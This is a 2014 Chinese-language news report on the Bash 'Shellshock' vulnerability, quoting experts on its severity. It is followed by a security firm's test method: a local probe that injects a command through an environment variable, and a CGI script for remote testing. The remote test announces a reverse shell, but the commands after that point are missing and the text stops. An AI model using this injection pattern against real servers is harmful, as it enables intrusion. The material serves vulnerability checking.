北京時間9月25日訊息,Linux使用者今天又得到了一個“驚喜”!Red Hat安全團隊在 Linux 中廣泛使用的Bash shell中發現了一個隱晦而危險的安全性漏洞。該漏洞被稱為“Bash Bug”或“Shellshock”。
當使用者正常訪問,該漏洞允許攻擊者的代碼像在Shell中一樣執行,這就為各種各樣的攻擊開啟了方便之門。而且,更糟糕的是,該漏洞已經在Linux中存在很長時間了,所以修補某個Linux機器很容易,但是要全部修補,幾乎不可能實現。
Red Hat和Fedora已經發布了針對該漏洞的Hotfix。該漏洞也會影響OS X,不過蘋果公司尚未發布正式的Hotfix。
這個Bash漏洞可能比Heartbleed更危險。
— — Robert Graham (@ErrataRob) 2014 年 9 月 24 日
Red Hat的Robert David Graham比較了該漏洞和Heartbleed,發現前者分布更廣泛,有可能對系統安全帶來長期影響。Graham在一篇部落格文章中寫道:“有大量的軟體以某種方式與Shell互動,我們沒有辦法列舉出受該漏洞影響的所有軟體。”據The Verge報道,Berkeley ICSI的研究員Nicholas Weaver也同意這個說法:“它很隱晦、很可怕,並且會伴隨我們多年。”
網路安全公司Rapid7工程部經理Tod Beardsley警告稱,Bash漏洞的嚴重層級為“10”,這意味著它對使用者電腦的威脅最大。Bash漏洞的利用複雜度層級為“低”,意味著駭客可以相對輕鬆地利用它發動攻擊。
另外,網路安全公司Trail of Bits的CEO Dan Guido表示,“Heartbleed”漏洞能夠允許駭客監控使用者電腦,但不會取得控制權。而利用Bash漏洞的方法也更簡單——只需要剪下和粘貼一行代碼即可。
據稱,Google安全研究員Tavis Ormandy在Twitter上表示,Linux系統供應商推出的補丁似乎“並不完整”,這引發了幾位安全專家的擔憂。(責編/單明珠)
本文轉載自Linux中國,原文出自The Verge,部分內容有刪改。
目前,360資訊安全中心應發布“Bash”漏洞測試方法,同時提醒廣大網站和企業及時更新服務務器安全補丁,避免造成重大危險。
“Bash”漏洞測試方法
1)、本地測試
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
2)、遠程測試
首先用BASH寫一個CGI
root@kali:/usr/lib/cgi-bin# cat bug.sh
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0
放到/usr/lib/cgi-bin裡,然後用curl訪問
能列印出環境變數了。說明能夠正常訪問了。下面反彈一個SHELL
訪問看結果: